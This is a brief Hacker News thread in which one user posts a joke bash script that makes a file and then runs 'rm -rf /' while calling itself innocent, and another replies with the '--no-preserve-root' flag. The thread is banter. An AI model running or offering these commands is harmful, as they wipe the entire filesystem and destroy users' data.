Y
Hacker News
new
|
ask
|
show
|
jobs
by
whenov
3787 days ago
#!/bin/bash touch x if [ -f "x" ]; then rm -rf / else echo "I'm just an innocent little script." fi
1 comments
singlow
3787 days ago
rm -rf --no-preserve-root
link
justinjlynn
3787 days ago
Never put salt in your eyes. -- Kids In The Hall
link